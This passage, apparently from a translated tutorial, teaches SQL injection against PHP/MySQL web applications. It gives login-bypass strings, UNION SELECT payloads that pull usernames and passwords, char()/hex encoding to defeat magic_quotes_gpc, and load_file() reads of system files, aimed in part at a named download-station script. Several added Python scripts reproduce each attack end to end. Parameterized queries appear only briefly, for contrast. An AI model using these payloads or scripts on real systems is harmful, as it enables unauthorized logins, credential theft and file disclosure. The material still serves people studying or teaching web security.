Let's build the injection statement.
Enter in the input box:
a%' and 1=2 union select 1,username,3,4,5,6,7,8,password,10,11 from alphaauthor#
which is substituted into the SQL statement as:
SELECT * from alphadb where title like '%a%' and 1=2 union select 1,username,3,4,5,6,7,8,password,10,11 from alphaauthor#%'
(everything after the # is a comment, so the trailing %' from the original query is ignored.)
The results are as shown in Figure 17.
See, out it comes, haha, everything under control.
C: Let's look at the injection attacks one injection point at a time.
1) First, the backend login.
Code first, login.php:
.......
$query = "SELECT * from Alphaauthor where username='"
    . $HTTP_POST_VARS["UserName"] . "' and
    Password='" . $HTTP_POST_VARS["Password"] . "'";
$result = mysql_query($query);
$data = mysql_fetch_array($result);
if ($data)
{
    echo "Backend login success";
}
else
{
    echo "Log in again";
    exit;
}
.........
?>
The username and password go straight into the SQL statement without any processing.
See how we get around it?
The classic one:
Enter in both the username and password boxes
' or ''='
which is substituted into the SQL statement as
SELECT * from Alphaauthor where username='' or ''='' and password='' or ''=''
Because AND binds tighter than OR, this reads as username='' OR (''='' AND password='') OR ''='', and the last ''='' is always true, so $data is non-empty and we are logged in.
There are other bypass methods; the principle is the same: find a way to make $data come back true.
We can use any of the following:
1.
Enter in both the username and password boxes: ' or 'a'='a
The SQL becomes
SELECT * from Alphaauthor where username='' or 'a'='a' and password='' or 'a'='a'
2.
Enter in both the username and password boxes: ' or 1=1 and ''='
The SQL becomes
SELECT * from Alphaauthor where username='' or 1=1 and ''='' and password='' or 1=1 and ''=''
Or enter in both boxes: ' or 2>1 and ''='
The SQL becomes
SELECT * from Alphaauthor where username='' or 2>1 and ''='' and password='' or 2>1 and ''=''
3.
Enter ' or 1=1 # as the username; the password can be anything
The SQL becomes
SELECT * from Alphaauthor where username='' or 1=1 #' and password='anything'
Everything after the # is commented out, so of course the condition is true.
4.
Assuming admin's id=1, you can also
enter ' or id=1 # as the username; the password can be anything
The SQL becomes
SELECT * from Alphaauthor where username='' or id=1 #' and password='anything'
The difference from method 3 is that or 1=1 logs you in as whichever row the database returns first, while or id=1 picks exactly the row you want.
As shown in Figure 18.
Look at the effect in Figure 19.
What do you think? Logged straight in!
As the saying goes, the only limit is what you can't think of.
There are more constructions waiting for you to work out after class.
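The login bypasses above, as an added example that is not code from the article: the same string-concatenated query as login.php, rebuilt in Python against an in-memory SQLite table so it runs offline, with every payload from the list run through it and a parameterized version beside it for contrast. The Alphaauthor row is constructed; SQLite uses -- rather than MySQL's # for a line comment, so payloads 3 and 4 are written with --.

```python
import sqlite3

# Added example, not the article's code. Reproduces login.php's query
# against SQLite. Constructed data: one admin row.

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Alphaauthor (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO Alphaauthor VALUES (1, 'alpha', 's3cret')")
    return con

def vulnerable_login(con, username, password):
    # Same string concatenation as login.php: no escaping, no parameters.
    query = ("SELECT * FROM Alphaauthor WHERE username='" + username +
             "' AND password='" + password + "'")
    row = con.execute(query).fetchone()        # $data = mysql_fetch_array(...)
    return row is not None

def safe_login(con, username, password):
    # Hardened form: bound parameters, so the input can never change the query.
    row = con.execute(
        "SELECT * FROM Alphaauthor WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row is not None

# The bypass strings from the text: (username box, password box).
# MySQL's '#' comment is written as SQLite's '--' in the last two.
PAYLOADS = {
    "classic ' or ''='":       ("' OR ''='",          "' OR ''='"),
    "' or 'a'='a":             ("' OR 'a'='a",        "' OR 'a'='a"),
    "' or 1=1 and ''='":       ("' OR 1=1 AND ''='",  "' OR 1=1 AND ''='"),
    "' or 1=1 # (comment)":    ("' OR 1=1 --",        "anything"),
    "' or id=1 # (pick row)":  ("' OR id=1 --",       "anything"),
}

def run_all():
    # Returns {payload name: (vulnerable result, parameterized result)}.
    con = make_db()
    results = {}
    for name, (u, p) in PAYLOADS.items():
        results[name] = (vulnerable_login(con, u, p), safe_login(con, u, p))
    return results

if __name__ == "__main__":
    for name, (vuln, safe) in run_all().items():
        print(f"{name:26} vulnerable={vuln}  parameterized={safe}")
```

Every payload logs in through vulnerable_login() and none of them through safe_login(); only the real credentials pass the parameterized version.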
2) The second common injection point is the front-end data display.
It has been mentioned several times already, covering numeric type, character type and so on, so I won't repeat it here.
Just a quick look back at one example:
The Blue Sea Tide Sound download station v2.0.3 Lite has an injection flaw; the code is not listed again,
look straight at the result:
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users
As shown in Figure 20.
Look, we got what we wanted:
Username: alpha
Password: a long string.
Why put password in field 3 and username in field 5? As mentioned above, we guessed that fields 3 and 5 are string typed, and the username and password fields we want to display should have the same type, so that is where we put them.
Why 18 fields? Remember from the union select introduction that UNION requires the same number of columns before and after the SELECT. We add one more column to the select at a time until the query stops erroring, and find that 18 are needed; only then does the union select content display normally.
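The column-count guess and the field placement described above, as an added example that is not code from the article: a Python script that reproduces the dlid query against an in-memory SQLite table with 18 columns, grows the UNION SELECT until the database stops complaining, then drops username and password into positions 5 and 3. The dl_downloads table, its contents and the password value are constructed assumptions. SQLite raises an error on a column-count mismatch just as MySQL does (MySQL reports "The used SELECT statements have a different number of columns"), but it doesn't care about column types, so the string-type concern from the text doesn't show up here.

```python
import sqlite3

# Added example, not the article's code. Constructed schema: an 18-column
# downloads table (the page does SELECT *) and the dl_users table from the text.
PASSWORD_HASH = "constructed-long-hash-value"

def make_db():
    con = sqlite3.connect(":memory:")
    cols = ["dlid INTEGER"] + [f"c{i} TEXT" for i in range(2, 19)]
    con.execute(f"CREATE TABLE dl_downloads ({', '.join(cols)})")
    vals = ["1"] + [f"'v{i}'" for i in range(2, 19)]
    con.execute(f"INSERT INTO dl_downloads VALUES ({', '.join(vals)})")
    con.execute("CREATE TABLE dl_users (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO dl_users VALUES (1, 'alpha', ?)", (PASSWORD_HASH,))
    return con

def page_query(con, dlid):
    # index.php?dlid=...: the numeric parameter is dropped straight into the
    # SQL, so no quote is needed to break out of anything.
    return con.execute("SELECT * FROM dl_downloads WHERE dlid=" + dlid).fetchall()

def find_column_count(con, max_cols=40):
    # Add one more column to the UNION SELECT each round. A mismatch is a
    # database error; the first n that runs cleanly is the column count.
    for n in range(1, max_cols + 1):
        nums = ",".join(str(i) for i in range(1, n + 1))
        try:
            page_query(con, f"1 AND 1=2 UNION SELECT {nums}")
            return n
        except sqlite3.OperationalError:
            continue
    return None

def extract_credentials(con, ncols, user_pos=5, pass_pos=3):
    # Same payload as the URL in the text: 'and 1=2' suppresses the real row,
    # so the only row the page renders is the one built from dl_users.
    fields = [str(i) for i in range(1, ncols + 1)]
    fields[user_pos - 1] = "username"
    fields[pass_pos - 1] = "password"
    payload = f"1 AND 1=2 UNION SELECT {','.join(fields)} FROM dl_users"
    row = page_query(con, payload)[0]
    return row[user_pos - 1], row[pass_pos - 1]

if __name__ == "__main__":
    con = make_db()
    n = find_column_count(con)
    print("columns needed:", n)
    print("credentials:", extract_credentials(con, n))
```

On a real target the error is usually not shown; you watch for the page changing from an error page (or blank) back to normal output as the count grows.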
3) Others, such as data modification and user registration, mostly need user-level application features.
We have already talked about update and insert above; since they are not very common they are not discussed further here, though some advanced tricks for update and insert are mentioned below.
Two: Next is the teaching section on injection attacks when magic_quotes_gpc=on.
When magic_quotes_gpc=on, every ' (single quote), " (double quote), \ (backslash) and NUL character in the GET/POST/COOKIE variables is automatically escaped with a backslash, exactly what addslashes() does.
(magic_quotes_gpc was deprecated in PHP 5.3 and removed in PHP 5.4, so this section applies to older PHP installs.)
This kills the character-type injection method; now we can only inject into numeric parameters that are not passed through intval(). We have talked a lot about numeric injection: a numeric value is naturally not wrapped in single quotes, so there is no quote to get past and we inject directly.
1) If the target is a character type, it has to look like the following: the characters are supplied without any quotes.
For that we first need some string-handling functions.
There are many string functions; we mainly use the following one (see section 7.4.10 of the MySQL Chinese reference manual):
char() interprets its arguments as integers and returns a string made of the characters with those ASCII codes.
Of course you can also use the hexadecimal form of the string instead; that works too. Just prefix the hex digits with 0x. See the example below.
login.php
......
$query = "SELECT * from " . $art_system_db_table['user'] . "
    where username=$username and password='" . $Pw . "'";
......
?>
(With register_globals, $username comes straight from the query string, and the program does not put quotes around it.)
Say we know the backend username is alpha.
Converted to ASCII codes it is char(97,108,112,104,97)
Converted to hex it is 0x616c706861
(A hex/ASCII conversion tool is provided on the CD.)
OK, just type this in the browser:
http://localhost/site/admin/login.php?username=char(97,108,112,104,97)%23
The SQL statement becomes:
SELECT * from Alphaauthor where username=char(97,108,112,104,97) # and password=''
As shown in Figure 21.
As expected, it executes fine and we get what we want.
Of course we can also construct
http://localhost/site/admin/login.php?username=0x616C706861%23
The SQL statement becomes:
SELECT * from Alphaauthor where username=0x616c706861# and password=''
Once again we win. What a sense of accomplishment.
Maybe you will ask whether we can put the # inside char().
Actually char(97,108,112,104,97) equals 'alpha'.
Note that this is the quoted string 'alpha'.
We know that if you run this in MySQL:
mysql> SELECT * from dl_users where username=alpha;
ERROR 1054 (42S22): Unknown column 'alpha' in 'where clause'
Look at the error: MySQL treats an unquoted alpha as a column name. So we have to quote alpha, as follows:
mysql> SELECT * from dl_users where username='alpha';
This is the correct way.
If you put the # inside char(), the result is 'alpha#'.
Substituted into the SQL statement:
SELECT * from dl_users where username='alpha#';
Of course this returns nothing, because there is no user named alpha#.
OK, let's look at the following example.
display.php
......
$query = "SELECT * from " . $art_system_db_table['Article'] . "
    where type=$type";
......
?>
The code displays content according to type; $type is not filtered at all, and the program does not wrap it in quotes.
Suppose there is a type called xiaohua; xiaohua converted with char() is
char(120,105,97,111,104,117,97)
We build
http://localhost/display.php?type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from Alphaauthor
Substituted into the SQL statement:
SELECT * from $art_system_db_table['Article'] where type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11 from Alphaauthor
Look, our username and password still come out! No screenshot, just imagine it :P
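The magic_quotes_gpc=on situation and the char()/0x trick, as an added example that is not the article's code: a Python emulation of PHP's addslashes() (what magic_quotes_gpc applied to every request value), two small encoders that produce the char(...) and 0x... forms, and the login.php and display.php queries from this section reproduced against SQLite. SQLite's char() takes the same argument list as MySQL's, so the unquoted char() payloads run as-is; the 0x... form is MySQL-only syntax and is only generated here, not executed. The table layouts, the article table name and the password value are constructed assumptions, and the same to_char() produces the load_file() path argument used in the next section.

```python
import sqlite3

# Added example, not the article's code. Emulates magic_quotes_gpc=on and
# shows why char()/0x encoding slips past it when the injected value lands in
# an unquoted position. Table layouts and values are constructed assumptions.

def magic_quotes(value):
    """PHP addslashes(): a backslash before ' " \\ and NUL. This is what
    magic_quotes_gpc=on did to every GET/POST/COOKIE value."""
    out = []
    for ch in value:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)

def to_char(s):
    """'alpha' -> 'char(97,108,112,104,97)': a string with no quotes in it."""
    return "char(" + ",".join(str(b) for b in s.encode("ascii")) + ")"

def to_hex(s):
    """'alpha' -> '0x616c706861' (MySQL hexadecimal string literal)."""
    return "0x" + s.encode("ascii").hex()

def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Alphaauthor (id INTEGER, username TEXT, password TEXT)")
    con.execute("INSERT INTO Alphaauthor VALUES (1, 'alpha', 'constructed-hash')")
    cols = ["id INTEGER", "type TEXT"] + [f"c{i} TEXT" for i in range(3, 12)]
    con.execute(f"CREATE TABLE article ({', '.join(cols)})")   # 11 columns, as in the text
    return con

def login(con, username, password):
    # login.php from the text: $username unquoted, $Pw quoted. Both values are
    # run through magic_quotes() first, as PHP did before the script saw them.
    u, p = magic_quotes(username), magic_quotes(password)
    sql = f"SELECT * FROM Alphaauthor WHERE username={u} AND password='{p}'"
    return con.execute(sql).fetchone() is not None

def display(con, type_param):
    # display.php from the text: $type unquoted and unfiltered.
    sql = "SELECT * FROM article WHERE type=" + magic_quotes(type_param)
    return con.execute(sql).fetchall()

def demo():
    # Returns (logged in with char()?, (username, password) pulled via UNION).
    con = make_db()
    # The text uses %23 (#) to comment out the password check; SQLite wants --.
    logged_in = login(con, to_char("alpha") + " --", "anything")
    fields = [str(i) for i in range(1, 12)]
    fields[2], fields[4] = "username", "password"
    payload = (f"{to_char('xiaohua')} AND 1=2 UNION SELECT "
               f"{','.join(fields)} FROM Alphaauthor")
    row = display(con, payload)[0]
    return logged_in, (row[2], row[4])

if __name__ == "__main__":
    print("classic payload after magic_quotes:", magic_quotes("' or ''='"))
    print(to_char("alpha"), to_hex("alpha"))
    print(demo())
```

Because the char() payload contains no quote, backslash or NUL, magic_quotes() returns it unchanged, while the classic ' or ''=' comes out as \' or \'\'=\' and is just a (wrong) password string.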
2) Some people may ask: with magic_quotes_gpc=on, can the powerful load_file() still be used?
That is exactly the problem we are going to deal with. The format of load_file() is load_file('file path').
We find that simply converting 'file path' with char() does the job. Try it!
load_file('c:/boot.ini') becomes
load_file(char(99,58,47,98,111,111,116,46,105,110,105))
Figure 22.
Put it into a concrete injection:
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,load_file(char(99,58,47,98,111,111,116,46,105,110,105)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
Look at Figure 23.
Look, we can see the contents of boot.ini.
(load_file() needs the FILE privilege on the database account, and on newer MySQL the path must be allowed by secure_file_priv; otherwise it returns NULL.)
It is a pity that into outfile cannot be bypassed this way: INTO OUTFILE takes only a literal quoted file name, not an expression like char(), and quotes are exactly what magic_quotes kills. Otherwise it would be even more fun. But there is still one place where SELECT * from table into outfile can be used. (Keeping you in suspense for now; it is covered below.)